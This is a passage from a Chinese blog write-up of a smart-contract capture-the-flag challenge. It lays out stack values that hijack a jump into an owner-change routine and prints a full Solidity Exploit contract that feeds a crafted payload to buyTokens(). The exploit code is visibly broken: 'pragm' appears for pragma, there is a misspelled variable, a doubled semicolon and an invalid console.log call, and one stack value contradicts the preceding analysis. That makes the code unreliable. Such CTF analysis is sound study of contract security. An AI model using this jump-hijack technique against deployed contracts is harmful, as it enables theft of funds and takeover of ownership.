function label_0C4A(uint jumpBack) internal {
	owner = newOwenr;
	assembly{
		jump(jumpBack)
	}
}

我们可以知道我们需要的栈应该是:

000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance
0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
0000000000000000000000000000000000000000000000000000000000000000//var6 = back1
0000000000000000000000000000000000000000000000000000000000000000//var7 = back2
0000000000000000000000000000000000000000000000000000000000000001//var6 = back3
0000000000000000000000000000000000000000000000000000000000000000//var7 = back4
0000000000000000000000000000000000000000000000000000000000000000//var6 = back5
0000000000000000000000000000000000000000000000000000000000000000//var7 = back6
0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点
0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0
0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0
000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup)
0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0
0000000000000000000000000000000000000000000000000000000000000C4A//var7 = jumpBack
0000000000000000000000000000000000000000000000000000000000000000//var6 = exit
0000000000000000000000000000000000000000000000000000000000000C4A//var7 = UNKNOW

执行完毕

我们的堆栈在这里已经满足了所有的三个条件,现在需要执行完毕,退出。

label_0366:
	// Incoming return from call to 0x0350 at 0x034B
	0366    5B  JUMPDEST
	0367    00  *STOP

故我们的堆栈最后为:

000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD//var6 = deadbeaf
000000000000000000000000000000000000000000000000000000000000191B//var7 = jumpback
000000000000000000000000000000000000000000000002b5e3af16b1880004//var6 = balance
0000000000000000000000000000000000000000000000000000000000000000//var7 = addr任意
0000000000000000000000000000000000000000000000000000000000000000//var6 = back1
0000000000000000000000000000000000000000000000000000000000000000//var7 = back2
0000000000000000000000000000000000000000000000000000000000000001//var6 = back3
0000000000000000000000000000000000000000000000000000000000000000//var7 = back4
0000000000000000000000000000000000000000000000000000000000000000//var6 = back5
0000000000000000000000000000000000000000000000000000000000000000//var7 = back6
0000000000000000000000000000000000000000000000000000000000001563//var6 = back7:下一个位点
0000000000000000000000000000000000000000000000000000000000000000//var7 = value = 0
0000000000000000000000000000000000000000000000000000000000000000//var6 = y = 0
000000000000000000000000DA0bab807633f07f013f94DD0E6A4F96F8742B53//var7 = akey=address(setup)
0000000000000000000000000000000000000000000000000000000000000000//var6 = x = 0
0000000000000000000000000000000000000000000000000000000000000C4A//var7 = jumpBack
0000000000000000000000000000000000000000000000000000000000000366//var6 = exit
0000000000000000000000000000000000000000000000000000000000000000//var7 = Not Use

合约整理

在上面的分析中,我们已经知道了破解所需要的步骤,现在将其整理出来:

pragm solidity ^0.7.0;
import "./Setup.sol";
contract Exploit {
	Setup public setup;
	ChallengeInterface public challenge;
	bytes32[] public payload;
	constructor(address _setup) public payable{
		setup = Setup(_setup);
		challenge = setup.challenge();
	}
	function preHack() public {
		(bool success, ) = challenge.call(abi.encodeWithSelector(0x27f83350,0x19FC));
        require(success,"Exploit/prehack failed");
	}
    function wrapIntoStack(bytes32 a, bytes32 b) internal {
        uint len = payload.length / 4;
        payload.push(
            hex'00000000000000000000000000000000000000000000000000000000000019FC');
        uint offset = 4 + 32*4*len;
        payload.push(bytes32(offset));
        payload.push(a);
        payload.push(b);
    }
	function hack() public {
		preHack();
		payload.push(bytes32(uint(4)));
		bytes32 task1_deadbeaf = 
            hex'000000000000000000000000deaDDeADDEaDdeaDdEAddEADDEAdDeadDEADDEaD';
        bytes32 task1_jumpback = 
            hex'000000000000000000000000000000000000000000000000000000000000191B';
        wrapIntoStack(task1_deadbeaf, task1_jumpback);
        bytes32 task2_balance = 
            hex'000000000000000000000000000000000000000000000002b5e3af16b1880004';
        bytes32 task2_addr = bytes32(uint256(uint160(address(msg.sender))));
        wrapIntoStack(task2_balance, task2_addr);
        bytes32 task3_back1 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000000';
        bytes32 task3_back2 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000000';
        bytes32 task3_back3 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000001';
        bytes32 task3_back4 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000000';
        bytes32 task3_back5 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000000';
        bytes32 task3_back6 = 
        	hex'0000000000000000000000000000000000000000000000000000000000000000';
        wrapIntoStack(task3_back1, task3_back2);
        wrapIntoStack(task3_back3, task3_back4);
        wrapIntoStack(task3_back5, task3_back6);
        bytes32 task4_back7 = 
            hex'0000000000000000000000000000000000000000000000000000000000001563';
        bytes32 task4_value = 
            hex'0000000000000000000000000000000000000000000000000000000000000000';
        wrapIntoStack(task4_back7, task4_value);
		bytes32 task4_y = 
            hex'0000000000000000000000000000000000000000000000000000000000001563';
        bytes32 task4_setup_addr = bytes32(uint256(uint160(address(setup))));;
        wrapIntoStack(task4_y, task4_setup_addr);
        bytes32 task4_x = 
            hex'0000000000000000000000000000000000000000000000000000000000000000';
        bytes32 task4_jumpBack = 
            hex'0000000000000000000000000000000000000000000000000000000000000C4A';
        wrapIntoStack(task4_x, task4_jumpBack);
        bytes32 task5_exit = 
            hex'0000000000000000000000000000000000000000000000000000000000000366';
        bytes32 task5_Unused = 
            hex'0000000000000000000000000000000000000000000000000000000000000000';
        wrapIntoStack(task5_exit, task5_Unused);
        (bool success, ) = challenge.call{value:0x04}(abi.encodeWithSignature("buyTokens()",payload));
        console.log(payload);
        require(success, "Exploit/hack failed");
        
	}
}

pp.png

点赞 2
收藏 1
分享
本文参与登链社区写作激励计划 ,好文好收益,欢迎正在阅读的你也加入。

0 条评论

请先 登录 后评论